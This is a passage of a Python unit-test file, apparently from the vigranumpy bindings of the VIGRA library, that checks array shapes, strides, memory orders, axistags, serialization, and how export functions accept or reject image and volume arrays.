        assert_equal(sys.getrefcount(b), 2)
        assert_equal(b.shape, img.shape)
        assert_equal(b.strides, img.strides)
        assert_equal(b.order, img.order)
        assert_equal(b.flags.c_contiguous, img.flags.c_contiguous)
        assert_equal(b.flags.f_contiguous, img.flags.f_contiguous)
        assert (b == img).all()
        assert not numpy.may_share_memory(b, img)

    shape = (channels, 5, 10, 20)
    axistags = [AxisInfo.c, AxisInfo.x, AxisInfo.y, AxisInfo.z]
    axistags3 = AxisTags(AxisInfo.y, AxisInfo.z, AxisInfo.x)
    axistags4 = AxisTags(AxisInfo.y, AxisInfo.z, AxisInfo.x, AxisInfo.c)
    axistags5 = AxisTags(AxisInfo.c, AxisInfo.x, AxisInfo.y, AxisInfo.z, AxisInfo.t)

    # figure out expected strides and axistags
    s = 0 if hasChannelAxis else 1
    d = dim + 1
    fshape = shape[s:d]
    fstrides = computeFStrides(fshape)
    faxistags = AxisTags(axistags[s:d])
    cshape = tuple(reversed(fshape))
    cstrides = computeCStrides(cshape)
    caxistags = AxisTags(list(reversed(faxistags)))
    vshape = fshape[1-s:d] + fshape[:1-s]
    vstrides = computeVStrides(vshape, hasChannelAxis)
    vaxistags = AxisTags(axistags[1:d] + axistags[:1-s])
    # byte strides: dtype is float32 (asserted below), i.e. 4 bytes/element
    fcstrides = tuple([k*4 for k in cstrides])
    fvstrides = tuple([k*4 for k in vstrides])
    ffstrides = tuple([k*4 for k in fstrides])
    value = 1 if channels == 1 else range(1,channels+1)

    # test type
    img = cls(vshape, order="V")
    # assert type(img) is cls
    assert isinstance(img, numpy.ndarray)
    assert_equal(img.dtype, numpy.float32)
    assert_equal(sys.getrefcount(img), 2)

    # test shape
    checkShape(img.shape, vshape)
    assert_equal(img.width, vshape[0])
    assert_equal(img.height, vshape[1])
    if dim == 3:
        assert_equal(img.depth, vshape[2])
    assert_equal(img.channels, channels)
    assert_equal(img.spatialDimensions, dim)

    # test strides and order
    checkStride(img.strides, fvstrides)
    if channels > 1:
        assert_equal(img.order, "V" if hasChannelAxis else "F")
    else:
        # a single-channel array may legitimately report either order
        assert_true(img.order in ['V', 'F'])
    assert_equal(img.flags.c_contiguous, False)

    # test axistags
    assert_equal(img.axistags, vaxistags)
    assert_equal(img.view5D('F').axistags, axistags5)
    assert_equal(img.withAxes('y', 'z', 'x', 'c').axistags, axistags4)
    assert_equal(img.withAxes('yzxc').axistags, axistags4)
    assert_equal(img.withAxes(axistags4).axistags, axistags4)
    assert_true(img.withAxes(img.axistags) is img)
    array = img.noTags()
    assert_equal(type(array), numpy.ndarray)
    assert_equal(arraytypes.taggedView(array, vaxistags).axistags, vaxistags)
    assert_equal(arraytypes.taggedView(array, vaxistags.keys()).axistags, vaxistags)
    assert_equal(arraytypes.taggedView(array, ''.join(vaxistags.keys())).axistags, vaxistags)
    if img.channels == 1:
        assert_equal(img.withAxes('y', 'z', 'x').axistags, axistags3)
    else:
        # dropping the channel axis must fail for multi-channel arrays
        try:
            img.withAxes('y', 'z', 'x')
            raise AssertionError("img.withAxes() failed to throw on non-singleton channel.")
        except RuntimeError:
            pass
    # FIXME: add more tests

    # test initialization and assignment
    assert_equal(img.min(), 0.0)
    assert_equal(img.max(), 0.0)
    img = cls(vshape, order="V", value=99.0)
    assert_equal(img.min(), 99.0)
    assert_equal(img.max(), 99.0)
    img.flat[:] = range(img.size)
    assert_equal(img.flatten().tolist(), list(range(img.size)))
    img[1,2] = value
    assert_equal((img[1,2]==value).all(), True)

    # test that copy and ufuncs preserve memory layout
    testCopy(img)
    assert_equal(img.shape, (-img).shape)
    assert_equal(img.strides, (-img).strides)
    assert_equal(img.axistags, (-img).axistags)
    assert_equal(img.shape, (img+img).shape)
    assert_equal(img.strides, (img+img).strides)
    assert_equal(img.axistags, (img+img).axistags)
    assert_equal(img.shape, (img*2).shape)
    assert_equal(img.strides, (img*2).strides)
    assert_equal(img.axistags, (img*2).axistags)

    # test shape, strides, and copy for 'F' order
    img = cls(fshape, order='F')
    assert_equal(sys.getrefcount(img), 2)
    checkShape(img.shape, fshape)
    checkStride(img.strides, ffstrides)
    assert_equal(img.axistags, faxistags)
    assert_equal(img.order, "F")
    assert_equal(img.flags.c_contiguous, False)
    assert_equal(img.flags.f_contiguous, True)
    assert_equal(img.min(), 0.0)
    assert_equal(img.max(), 0.0)
    img = cls(fshape, order="F", value=99.0)
    assert_equal(img.min(), 99.0)
    assert_equal(img.max(), 99.0)
    if dim == 2:
        img[...,1,2] = value
    else:
        img[...,0,1,2] = value
    testCopy(img)
    assert_equal(img.strides, (-img).strides)
    assert_equal(img.strides, (img+img).strides)
    assert_equal(img.strides, (img*2).strides)
    assert_equal(img.axistags, (-img).axistags)
    assert_equal(img.axistags, (img+img).axistags)
    assert_equal(img.axistags, (img*2).axistags)
    assert_equal(img.view5D('F').axistags, axistags5)
    assert_equal(img.withAxes('y', 'z', 'x', 'c').axistags, axistags4)

    # test shape, strides, and copy for 'A' order (should be equal to 'V' order)
    img = cls(vshape, order='A')
    assert_equal(sys.getrefcount(img), 2)
    checkShape(img.shape, vshape)
    checkStride(img.strides, fvstrides)
    if channels > 1:
        assert_equal(img.order, "V" if hasChannelAxis else "F")
    else:
        assert_true(img.order in ['V', 'F'])
    assert_equal(img.flags.c_contiguous, False)
    assert_equal(img.axistags, vaxistags)
    img[1,2] = value
    testCopy(img)
    assert_equal(img.strides, (-img).strides)
    assert_equal(img.strides, (img+img).strides)
    assert_equal(img.strides, (img*2).strides)
    assert_equal(img.axistags, (-img).axistags)
    assert_equal(img.axistags, (img+img).axistags)
    assert_equal(img.axistags, (img*2).axistags)

    # test shape, strides, and copy for 'C' order
    img = cls(cshape, order='C')
    assert_equal(sys.getrefcount(img), 2)
    checkShape(img.shape, cshape)
    checkStride(img.strides, fcstrides)
    assert_equal(img.axistags, caxistags)
    assert_equal(img.order, "C")
    assert_equal(img.flags.c_contiguous, True)
    assert_equal(img.flags.f_contiguous, False)
    assert_equal(img.min(), 0.0)
    assert_equal(img.max(), 0.0)
    img = cls(cshape, order="C", value=99.0)
    assert_equal(img.min(), 99.0)
    assert_equal(img.max(), 99.0)
    img[1,2] = value
    testCopy(img)
    assert_equal(img.strides, (-img).strides)
    assert_equal(img.strides, (img+img).strides)
    assert_equal(img.strides, (img*2).strides)
    assert_equal(img.axistags, (-img).axistags)
    assert_equal(img.axistags, (img+img).axistags)
    assert_equal(img.axistags, (img*2).axistags)
    assert_equal(img.view5D('F').axistags, axistags5)
    assert_equal(img.withAxes('y', 'z', 'x', 'c').axistags, axistags4)

    value = 10 if channels == 1 else range(10,channels+10)
    zero = 0 if channels == 1 else (0,)*channels

    # test shape, strides, and copy for dtype uint8
    img = cls(vshape, order="V")
    b = cls(img, dtype=numpy.uint8, order='V')
    assert_equal(sys.getrefcount(b), 2)
    assert_equal(b.dtype, numpy.uint8)
    checkShape(b.shape, img.shape)
    checkStride(b.strides, computeVStrides(b.shape, hasChannelAxis))
    if channels > 1:
        assert_equal(img.order, "V" if hasChannelAxis else "F")
    else:
        assert_true(img.order in ['V', 'F'])
    assert_equal(b.axistags, img.axistags)
    assert_equal(b.flags.c_contiguous, False)
    assert (b==img).all()
    # writing into the uint8 copy must not affect the float original
    b[2,1] = value
    assert (b[2,1]==value).all()
    assert (img[2,1]==zero).all()
    assert_equal(b.strides, (-b).strides)
    assert_equal(b.strides, (b+b).strides)
    assert_equal(b.strides, (b*2).strides)
    assert_equal(b.axistags, (-b).axistags)
    assert_equal(b.axistags, (b+b).axistags)
    assert_equal(b.axistags, (b*2).axistags)
    img = cls(cshape, order="C")
    b = cls(img, dtype=numpy.uint8, order='C')
    assert_equal(sys.getrefcount(b), 2)
    checkShape(b.shape, img.shape)
    checkStride(b.strides, computeCStrides(b.shape))
    assert_equal(b.axistags, img.axistags)
    assert_equal(b.order, "C")
    assert b.flags.c_contiguous
    assert not b.flags.f_contiguous
    assert (b==img).all()
    assert_equal(b.strides, (-b).strides)
    assert_equal(b.strides, (b+b).strides)
    assert_equal(b.strides, (b*2).strides)
    assert_equal(b.axistags, (-b).axistags)
    assert_equal(b.axistags, (b+b).axistags)
    assert_equal(b.axistags, (b*2).axistags)
    img = cls(fshape, order="F")
    b = cls(img, dtype=numpy.uint8, order='F')
    assert_equal(sys.getrefcount(b), 2)
    checkShape(b.shape, img.shape)
    checkStride(b.strides, computeFStrides(b.shape))
    assert_equal(b.axistags, img.axistags)
    assert_equal(b.order, "F")
    assert not b.flags.c_contiguous
    assert b.flags.f_contiguous
    assert (b==img).all()
    assert_equal(b.strides, (-b).strides)
    assert_equal(b.strides, (b+b).strides)
    assert_equal(b.strides, (b*2).strides)
    assert_equal(b.axistags, (-b).axistags)
    assert_equal(b.axistags, (b+b).axistags)
    assert_equal(b.axistags, (b*2).axistags)

    value = 100 if channels == 1 else range(100,channels+100)

    # test ndarray view: views share memory with the original array
    img = cls(vshape, order="V")
    v1 = img.view(numpy.ndarray)
    v2 = img.view(numpy.ndarray)
    assert type(v1) is numpy.ndarray
    assert (v1==v2).all()
    assert numpy.may_share_memory(v1, img)
    v1[3,4] = value
    assert (v2[3,4]==value).all()
    assert (v1==v2).all()
def checkFailure(obj, n):
    """Assert that the vigranumpytest export function named `n` rejects `obj`.

    The call must raise ArgumentError; a normal return is reported as a
    test failure (any other exception propagates unchanged).
    """
    wrapped = getattr(vt, n)
    rejected = False
    try:
        wrapped(obj)
    except ArgumentError:
        rejected = True
    if not rejected:
        raise AssertionError("%r did not throw ArgumentError as expected when passed a %r with shape %s, stride %s, axistags '%s'" % (n, type(obj), str(obj.shape), str(obj.strides), repr(getattr(obj, "axistags", "none"))))
def checkCompatibility(obj, compatible):
    """Feed `obj` to every vigranumpytest export function.

    Functions whose names are listed in `compatible` must accept `obj`;
    each returns a 4-tuple (shape, copy, default-ordered array,
    same-ordered array) whose contents are checked for consistency with
    `obj`.  Every remaining function in the module-level set `allTests`
    must reject `obj` with ArgumentError (verified via checkFailure()).
    """
    for n in compatible:
        try:
            f = getattr(vt, n)
            shape, acopy, default_ordering, same_ordering = f(obj)
            # the exported shape and the round-tripped copy must match the input
            assert_equal(obj.shape, shape)
            assert_equal(obj.__class__, acopy.__class__)
            assert_equal(obj.shape, acopy.shape)
            if hasattr(obj, 'axistags'):
                assert_equal(obj.axistags, acopy.axistags)
            else:
                # inputs without axistags must not acquire them in the copy
                assert(not hasattr(acopy, 'axistags'))
            if n != "testAny":
                # "same ordering" result: identical shape and contents
                assert_equal(obj.shape, same_ordering.shape)
                assert(obj.view(numpy.ndarray) == same_ordering.view(numpy.ndarray)).all()
                if not hasattr(obj, 'axistags'):
                    # plain ndarray input: results stay plain ndarrays
                    assert_equal(numpy.ndarray, same_ordering.__class__)
                    assert(not hasattr(same_ordering, 'axistags'))
                    if n.startswith("testArray"):
                        assert_equal(numpy.ndarray, default_ordering.__class__)
                        assert_equal(obj.shape, default_ordering.shape)
                        assert(obj.view(numpy.ndarray) == default_ordering.view(numpy.ndarray)).all()
                        assert(not hasattr(default_ordering, 'axistags'))
                    else:
                        # image/volume wrappers return a VigraArray with default tags
                        assert_equal(arraytypes.VigraArray, default_ordering.__class__)
                        assert_equal(default_ordering.axistags,
                                     arraytypes.VigraArray.defaultAxistags(default_ordering.ndim))
                        if obj.ndim == default_ordering.ndim:
                            assert_equal(obj.shape, default_ordering.shape)
                            assert(obj.view(numpy.ndarray) == default_ordering.view(numpy.ndarray)).all()
                        else:
                            # a singleton channel axis may have been appended
                            assert_equal(obj.shape + (1,), default_ordering.shape)
                            assert(obj.view(numpy.ndarray) == default_ordering[...,0].view(numpy.ndarray)).all()
                else:
                    # VigraArray input: "same ordering" result keeps the axistags
                    assert_equal(arraytypes.VigraArray, same_ordering.__class__)
                    assert_equal(obj.axistags, same_ordering.axistags)
                    if n.startswith("testArray"):
                        # raw-array wrappers normalize to "normal order" and drop tags
                        assert_equal(numpy.ndarray, default_ordering.__class__)
                        fobj = obj.transposeToNormalOrder()
                        fshape = fobj.shape
                        assert_equal(fshape, default_ordering.shape)
                        assert(fobj.view(numpy.ndarray) == default_ordering.view(numpy.ndarray)).all()
                        assert(not hasattr(default_ordering, 'axistags'))
                    else:
                        # image/volume wrappers normalize to the default axis order
                        assert_equal(arraytypes.VigraArray, default_ordering.__class__)
                        dobj = obj.transposeToOrder(arraytypes.VigraArray.defaultOrder)
                        dshape = dobj.shape
                        assert_equal(default_ordering.axistags,
                                     arraytypes.VigraArray.defaultAxistags(default_ordering.ndim))
                        if obj.ndim == default_ordering.ndim:
                            assert_equal(dshape, default_ordering.shape)
                            assert(dobj.view(numpy.ndarray) == default_ordering.view(numpy.ndarray)).all()
                        else:
                            # a singleton channel axis may have been appended
                            assert_equal(dshape + (1,), default_ordering.shape)
                            assert(dobj.view(numpy.ndarray) == default_ordering[...,0].view(numpy.ndarray)).all()
        except Exception:
            print("exception in %s with shape %s strides %s tags (%s)" % (n, obj.shape, obj.strides,
                                                  repr(getattr(obj, "axistags", "none"))))
            raise
    # all functions not listed as compatible must reject the input
    incompatible = allTests.difference(compatible)
    for n in incompatible:
        try:
            checkFailure(obj, n)
        except Exception:
            print("exception in %s with shape %s strides %s tags (%s)" % (n, obj.shape, obj.strides,
                                                  repr(getattr(obj, "axistags", "none"))))
            raise
def testAxisTags():
    """Exercise AxisTags: JSON round-trip, pickling, default-tag creation,
    and the permutation/order query functions."""
    axistags = AxisTags(AxisInfo.c(description="RGB"),
                        AxisInfo.ft(3.0, "time frequency"),
                        AxisInfo.y(0.5),
                        AxisInfo.z(4, "confocal depth"))
    json = '''{
  "axes": [
    {
      "key": "c",
      "typeFlags": 1,
      "resolution": 0,
      "description": "RGB"
    },
    {
      "key": "t",
      "typeFlags": 24,
      "resolution": 3,
      "description": "time frequency"
    },
    {
      "key": "y",
      "typeFlags": 2,
      "resolution": 0.5,
      "description": ""
    },
    {
      "key": "z",
      "typeFlags": 2,
      "resolution": 4,
      "description": "confocal depth"
    }
  ]
}'''
    assert_equal(axistags.toJSON(), json)
    # JSON round-trip must preserve descriptions and resolutions
    readBack = AxisTags.fromJSON(json)
    assert_equal(axistags, readBack)
    assert_equal(readBack[0].description, "RGB")
    assert_equal(readBack[1].description, "time frequency")
    assert_equal(readBack[2].description, "")
    assert_equal(readBack[3].description, "confocal depth")
    assert_equal(readBack[0].resolution, 0)
    assert_equal(readBack[1].resolution, 3)
    assert_equal(readBack[2].resolution, 0.5)
    assert_equal(readBack[3].resolution, 4)
    # pickle round-trip must preserve the same data
    import pickle
    s = pickle.dumps(axistags)
    unpickled = pickle.loads(s)
    assert_equal(axistags, unpickled)
    assert_equal(unpickled[0].description, "RGB")
    assert_equal(unpickled[1].description, "time frequency")
    assert_equal(unpickled[2].description, "")
    assert_equal(unpickled[3].description, "confocal depth")
    assert_equal(unpickled[0].resolution, 0)
    assert_equal(unpickled[1].resolution, 3)
    assert_equal(unpickled[2].resolution, 0.5)
    assert_equal(unpickled[3].resolution, 4)
    # FIXME: add more tests here
    defaultTags = arraytypes.VigraArray.defaultAxistags('cxyt')
    assert_equal(defaultTags.permutationToOrder('A'), (0, 1, 2, 3))
    assert_equal(defaultTags.permutationToOrder('F'), (0, 1, 2, 3))
    assert_equal(defaultTags.permutationToOrder('C'), (3, 2, 1, 0))
    assert_equal(defaultTags.permutationToOrder('V'), (1, 2, 3, 0))
    assert_equal(defaultTags.permutationToNormalOrder(), (0, 1, 2, 3))
    assert_equal(defaultTags.permutationToNumpyOrder(), (3, 2, 1, 0))
    assert_equal(defaultTags.permutationToVigraOrder(), (1, 2, 3, 0))
    assert_equal(defaultTags.permutationFromNormalOrder(), (0, 1, 2, 3))
    assert_equal(defaultTags.permutationFromNumpyOrder(), (3, 2, 1, 0))
    assert_equal(defaultTags.permutationFromVigraOrder(), (3, 0, 1, 2))
    defaultTags = arraytypes.AxisTags(4)
    assert_equal(defaultTags.permutationToOrder('A'), (0, 1, 2, 3))
    assert_equal(defaultTags.permutationToOrder('F'), (0, 1, 2, 3))
    assert_equal(defaultTags.permutationToOrder('C'), (3, 2, 1, 0))
    assert_equal(defaultTags.permutationToOrder('V'), (0, 1, 2, 3))
    assert_equal(arraytypes.VigraArray.defaultAxistags('cxyz'),
                 arraytypes.VigraArray.defaultAxistags(4, order='F'))
    assert_equal(arraytypes.VigraArray.defaultAxistags('zyxc'),
                 arraytypes.VigraArray.defaultAxistags(4, order='C'))
    assert_equal(arraytypes.VigraArray.defaultAxistags('xyzc'),
                 arraytypes.VigraArray.defaultAxistags(4, order='V'))
    assert_equal(arraytypes.VigraArray.defaultAxistags('xyzc'),
                 arraytypes.VigraArray.defaultAxistags(4, order='A'))
    for order in 'VCF':
        defaultTags = arraytypes.VigraArray.defaultAxistags(3, order=order)
        assert_equal(defaultTags.permutationToOrder(order), (0, 1, 2))
        # BUGFIX: the conditional must be parenthesized.  The original
        # `assert (x == 0 if order == 'F' else 2)` parsed as
        # `(x == 0) if order == 'F' else 2`, which asserted the truthy
        # constant 2 for orders 'V' and 'C' — i.e. it checked nothing.
        assert (defaultTags.channelIndex == (0 if order == 'F' else 2))
        defaultTags.transpose(defaultTags.permutationToOrder('V'))
        assert_equal(defaultTags.permutationToVigraOrder(), (0, 1, 2))
        assert (defaultTags.channelIndex == 2)
        defaultTags = arraytypes.VigraArray.defaultAxistags(3, order=order, noChannels=True)
        assert_equal(defaultTags.permutationToOrder(order), (0, 1, 2))
        # with noChannels, channelIndex equals ndim, meaning "no channel axis"
        assert (defaultTags.channelIndex == 3)
def testImage1():
    """Single-band Image: generic checks, export compatibility, and views."""
    checkArray(arraytypes.Image, 1, 2)
    shape = (10, 20)
    rshape = (20, 10)
    compat = ["testAny",
              "testArray3Unstrided", "testArray3Strided",
              "testImageSinglebandUnstrided", "testImageSinglebandStrided",
              "testImageMultibandUnstrided", "testImageMultibandStrided"]
    for order, s in (('C', rshape), ('V', shape), ('F', shape)):
        checkCompatibility(arraytypes.Image(s, order=order, value=2), compat)
    compat = ["testAny",
              "testArray2Strided",
              "testImageSinglebandStrided",
              "testImageMultibandStrided"]
    plain = numpy.ndarray(rshape, dtype=numpy.float32)
    plain[...] = 2
    checkCompatibility(plain, compat)
    # after dropChannelAxis(), the 2D view functions must accept the array
    for order, s in (('C', rshape), ('V', shape), ('F', shape)):
        image = arraytypes.Image(s, order=order).dropChannelAxis()
        checkShape(vt.viewArray2Unstrided(image), shape)
        assert_equal(image[0, 0], 1)
def testImage2():
    """Two-band Image: generic checks, export compatibility, and views."""
    checkArray(arraytypes.Image, 2, 2)
    shape = (10, 20, 2)
    cshape = (20, 10, 2)
    fshape = (2, 10, 20)
    compat = ["testAny",
              "testArray3Unstrided", "testArray3Strided",
              "testImageVector2Unstrided", "testImageVector2Strided",
              "testImageMultibandStrided"]
    for order, s in (('C', cshape), ('V', shape), ('F', fshape)):
        checkCompatibility(arraytypes.Image(s, order=order, value=2), compat)
    compat = ["testAny",
              "testArray3Strided",
              "testImageMultibandStrided",
              "testImageVector2Strided",
              "testVolumeSinglebandStrided",
              "testVolumeMultibandStrided"]
    plain = numpy.ndarray(cshape, dtype=numpy.float32)
    plain[...] = 2
    checkCompatibility(plain, compat)
    # generic 3D array views (channel axis first in the exported shape)
    image = arraytypes.Image(cshape, order='C')
    assert_equal(vt.viewArray3Unstrided(image), fshape)
    assert (image[0, 0] == (1, 0)).all()
    image = arraytypes.Image(shape, order='V')
    assert_equal(vt.viewArray3Unstrided(image), fshape)
    assert (image[0, 0] == (1, 0)).all()
    image = arraytypes.Image(fshape, order='F')
    assert_equal(vt.viewArray3Strided(image), fshape)
    assert (image[:, 0, 0] == (1, 0)).all()
    # TinyVector-valued image views
    image = arraytypes.Image(cshape, order='C')
    assert_equal(vt.viewImageVector2Strided(image), shape[:-1])
    assert (image[0, 0] == (1, 1)).all()
    image = arraytypes.Image(shape, order='V')
    assert_equal(vt.viewImageVector2Unstrided(image), shape[:-1])
    assert (image[0, 0] == (1, 1)).all()
def testScalarImage():
    """ScalarImage (no explicit channel axis): generic checks and views."""
    checkArray(arraytypes.ScalarImage, 1, 2, False)
    shape = (10, 20)
    cshape = (20, 10)
    compat = ["testAny",
              "testArray2Unstrided", "testArray2Strided",
              "testImageSinglebandUnstrided", "testImageSinglebandStrided",
              "testImageMultibandUnstrided", "testImageMultibandStrided"]
    for order, s in (('C', cshape), ('V', shape), ('F', shape)):
        checkCompatibility(arraytypes.ScalarImage(s, order=order, value=2), compat)
    compat = ["testAny",
              "testArray2Strided",
              "testImageSinglebandStrided",
              "testImageMultibandStrided"]
    checkCompatibility(arraytypes.ScalarImage(cshape, order='C', value=2).view(numpy.ndarray), compat)
    # direct 2D views; the F-order layout requires the strided variant
    for order, s, view in (('C', cshape, vt.viewArray2Unstrided),
                           ('V', shape, vt.viewArray2Unstrided),
                           ('F', shape, vt.viewArray2Strided)):
        image = arraytypes.ScalarImage(s, order=order)
        checkShape(view(image), shape)
        assert_equal(image[0, 0], 1)
def testRGBImage():
    """RGBImage: generic checks, export compatibility, and RGB views."""
    checkArray(arraytypes.RGBImage, 3, 2)
    cshape = (20, 10)
    shape = (10, 20)
    rshape = (3, 10, 20)
    compat = ["testAny",
              "testArray3Unstrided", "testArray3Strided",
              "testImageRGBUnstrided", "testImageRGBStrided",
              "testImageMultibandStrided"]
    for order, s in (('C', cshape), ('V', shape), ('F', shape)):
        checkCompatibility(arraytypes.RGBImage(s, order=order, value=2), compat)
    compat = ["testAny",
              "testArray3Strided",
              "testImageMultibandStrided",
              "testImageRGBStrided",
              "testVolumeSinglebandStrided",
              "testVolumeMultibandStrided"]
    checkCompatibility(arraytypes.RGBImage(cshape, order='C', value=2).view(numpy.ndarray), compat)
    # generic 3D views (channel axis first in the exported shape)
    image = arraytypes.RGBImage(cshape, order='C')
    assert_equal(vt.viewArray3Unstrided(image), rshape)
    assert (image[0, 0] == (1, 0, 0)).all()
    image = arraytypes.RGBImage(shape, order='V')
    assert_equal(vt.viewArray3Unstrided(image), rshape)
    assert (image[0, 0] == (1, 0, 0)).all()
    image = arraytypes.RGBImage(shape, order='F')
    assert_equal(vt.viewArray3Strided(image), rshape)
    assert (image[:, 0, 0] == (1, 0, 0)).all()
    # RGBValue-typed views
    image = arraytypes.RGBImage(cshape, order='C')
    assert_equal(vt.viewImageRGBUnstrided(image), shape)
    assert (image[0, 0] == (1, 1, 1)).all()
    image = arraytypes.RGBImage(shape, order='V')
    assert_equal(vt.viewImageRGBStrided(image), shape)
    assert (image[0, 0] == (1, 1, 1)).all()
def testVector2Image():
    """Vector2Image: generic checks, export compatibility, and vector views."""
    checkArray(arraytypes.Vector2Image, 2, 2)
    cshape = (20, 10)
    shape = (10, 20)
    rshape = (2, 10, 20)
    compat = ["testAny",
              "testArray3Unstrided", "testArray3Strided",
              "testImageVector2Unstrided", "testImageVector2Strided",
              "testImageMultibandStrided"]
    for order, s in (('C', cshape), ('V', shape), ('F', shape)):
        checkCompatibility(arraytypes.Vector2Image(s, order=order, value=2), compat)
    compat = ["testAny",
              "testArray3Strided",
              "testImageMultibandStrided",
              "testImageVector2Strided",
              "testVolumeSinglebandStrided",
              "testVolumeMultibandStrided"]
    checkCompatibility(arraytypes.Vector2Image(cshape, order='C', value=2).view(numpy.ndarray), compat)
    # generic 3D views (channel axis first in the exported shape)
    image = arraytypes.Vector2Image(cshape, order='C')
    assert_equal(vt.viewArray3Unstrided(image), rshape)
    assert (image[0, 0] == (1, 0)).all()
    image = arraytypes.Vector2Image(shape, order='V')
    assert_equal(vt.viewArray3Unstrided(image), rshape)
    assert (image[0, 0] == (1, 0)).all()
    image = arraytypes.Vector2Image(shape, order='F')
    assert_equal(vt.viewArray3Strided(image), rshape)
    assert (image[:, 0, 0] == (1, 0)).all()
    # TinyVector-typed views
    image = arraytypes.Vector2Image(cshape, order='C')
    assert_equal(vt.viewImageVector2Unstrided(image), shape)
    assert (image[0, 0] == (1, 1)).all()
    image = arraytypes.Vector2Image(shape, order='V')
    assert_equal(vt.viewImageVector2Unstrided(image), shape)
    assert (image[0, 0] == (1, 1)).all()
def testVector3Image():
    """Run the generic array checks for the 3-band Vector3Image type."""
    cls = arraytypes.Vector3Image
    checkArray(cls, 3, 2)
def testVector4Image():
    """Run the generic array checks for the 4-band Vector4Image type."""
    cls = arraytypes.Vector4Image
    checkArray(cls, 4, 2)
def testVolume1():
    """Single-band Volume: generic checks, export compatibility, and views."""
    checkArray(arraytypes.Volume, 1, 3)
    shape = (5, 10, 20)
    rshape = (20, 10, 5)
    compat = ["testAny",
              "testArray4Unstrided", "testArray4Strided",
              "testVolumeSinglebandUnstrided", "testVolumeSinglebandStrided",
              "testVolumeMultibandUnstrided", "testVolumeMultibandStrided"]
    for order, s in (('C', rshape), ('V', shape), ('F', shape)):
        checkCompatibility(arraytypes.Volume(s, order=order, value=2), compat)
    compat = ["testAny",
              "testArray3Strided",
              "testImageMultibandStrided",
              "testVolumeSinglebandStrided",
              "testVolumeMultibandStrided"]
    plain = numpy.ndarray(rshape, dtype=numpy.float32)
    plain[...] = 2
    checkCompatibility(plain, compat)
    # after dropChannelAxis(), the 3D view functions must accept the array
    for order, s in (('C', rshape), ('V', shape), ('F', shape)):
        vol = arraytypes.Volume(s, order=order).dropChannelAxis()
        checkShape(vt.viewArray3Unstrided(vol), shape)
        assert_equal(vol[0, 0, 0], 1)
def testVolume2():
    """Two-band Volume: generic checks, export compatibility, and views."""
    checkArray(arraytypes.Volume, 2, 3)
    shape = (5, 10, 20, 2)
    cshape = (20, 10, 5, 2)
    fshape = (2, 5, 10, 20)
    compat = ["testAny",
              "testArray4Unstrided", "testArray4Strided",
              "testVolumeVector2Unstrided", "testVolumeVector2Strided",
              "testVolumeMultibandStrided"]
    for order, s in (('C', cshape), ('V', shape), ('F', fshape)):
        checkCompatibility(arraytypes.Volume(s, order=order, value=2), compat)
    compat = ["testAny",
              "testArray4Strided",
              "testVolumeVector2Strided",
              "testVolumeMultibandStrided"]
    plain = numpy.ndarray(cshape, dtype=numpy.float32)
    plain[...] = 2
    checkCompatibility(plain, compat)
    # generic 4D views (channel axis first in the exported shape)
    vol = arraytypes.Volume(cshape, order='C')
    assert_equal(vt.viewArray4Unstrided(vol), fshape)
    assert (vol[0, 0, 0] == (1, 0)).all()
    vol = arraytypes.Volume(shape, order='V')
    assert_equal(vt.viewArray4Unstrided(vol), fshape)
    assert (vol[0, 0, 0] == (1, 0)).all()
    vol = arraytypes.Volume(fshape, order='F')
    assert_equal(vt.viewArray4Strided(vol), fshape)
    assert (vol[:, 0, 0, 0] == (1, 0)).all()
    # TinyVector-valued volume views
    vol = arraytypes.Volume(cshape, order='C')
    assert_equal(vt.viewVolumeVector2Unstrided(vol), shape[:-1])
    assert (vol[0, 0, 0] == (1, 1)).all()
    vol = arraytypes.Volume(shape, order='V')
    assert_equal(vt.viewVolumeVector2Unstrided(vol), shape[:-1])
    assert (vol[0, 0, 0] == (1, 1)).all()
def testScalarVolume():
    """ScalarVolume (no explicit channel axis): generic checks and views."""
    checkArray(arraytypes.ScalarVolume, 1, 3, False)
    cshape = (20, 10, 5)
    shape = (5, 10, 20)
    compat = ["testAny",
              "testArray3Unstrided", "testArray3Strided",
              "testVolumeSinglebandUnstrided", "testVolumeSinglebandStrided",
              "testVolumeMultibandUnstrided", "testVolumeMultibandStrided"]
    for order, s in (('C', cshape), ('V', shape), ('F', shape)):
        checkCompatibility(arraytypes.ScalarVolume(s, order=order, value=2), compat)
    compat = ["testAny",
              "testArray3Strided",
              "testImageMultibandStrided",
              "testVolumeSinglebandStrided",
              "testVolumeMultibandStrided"]
    checkCompatibility(arraytypes.ScalarVolume(cshape, order='C', value=2).view(numpy.ndarray), compat)
    # direct 3D views; the F-order layout requires the strided variant
    for order, s, view in (('C', cshape, vt.viewArray3Unstrided),
                           ('V', shape, vt.viewArray3Unstrided),
                           ('F', shape, vt.viewArray3Strided)):
        vol = arraytypes.ScalarVolume(s, order=order)
        checkShape(view(vol), shape)
        assert_equal(vol[0, 0, 0], 1)
def testRGBVolume():
    """RGBVolume: generic checks, export compatibility, and RGB views."""
    checkArray(arraytypes.RGBVolume, 3, 3)
    cshape = (20, 10, 5)
    shape = (5, 10, 20)
    rshape = (3, 5, 10, 20)
    compat = ["testAny",
              "testArray4Unstrided", "testArray4Strided",
              "testVolumeRGBUnstrided", "testVolumeRGBStrided",
              "testVolumeMultibandStrided"]
    for order, s in (('C', cshape), ('V', shape), ('F', shape)):
        checkCompatibility(arraytypes.RGBVolume(s, order=order, value=2), compat)
    compat = ["testAny",
              "testArray4Strided",
              "testVolumeRGBStrided",
              "testVolumeMultibandStrided"]
    checkCompatibility(arraytypes.RGBVolume(cshape, order='C', value=2).view(numpy.ndarray), compat)
    # generic 4D views (channel axis first in the exported shape)
    vol = arraytypes.RGBVolume(cshape, order='C')
    checkShape(vt.viewArray4Unstrided(vol), rshape)
    assert (vol[0, 0, 0] == (1, 0, 0)).all()
    vol = arraytypes.RGBVolume(shape, order='V')
    checkShape(vt.viewArray4Unstrided(vol), rshape)
    assert (vol[0, 0, 0] == (1, 0, 0)).all()
    vol = arraytypes.RGBVolume(shape, order='F')
    checkShape(vt.viewArray4Strided(vol), rshape)
    assert (vol[:, 0, 0, 0] == (1, 0, 0)).all()
    # RGBValue-typed views
    vol = arraytypes.RGBVolume(cshape, order='C')
    checkShape(vt.viewVolumeRGBUnstrided(vol), shape)
    assert (vol[0, 0, 0] == (1, 1, 1)).all()
    vol = arraytypes.RGBVolume(shape, order='V')
    checkShape(vt.viewVolumeRGBUnstrided(vol), shape)
    assert (vol[0, 0, 0] == (1, 1, 1)).all()
def testVector2Volume():
    """Vector2Volume: generic checks, export compatibility, and vector views."""
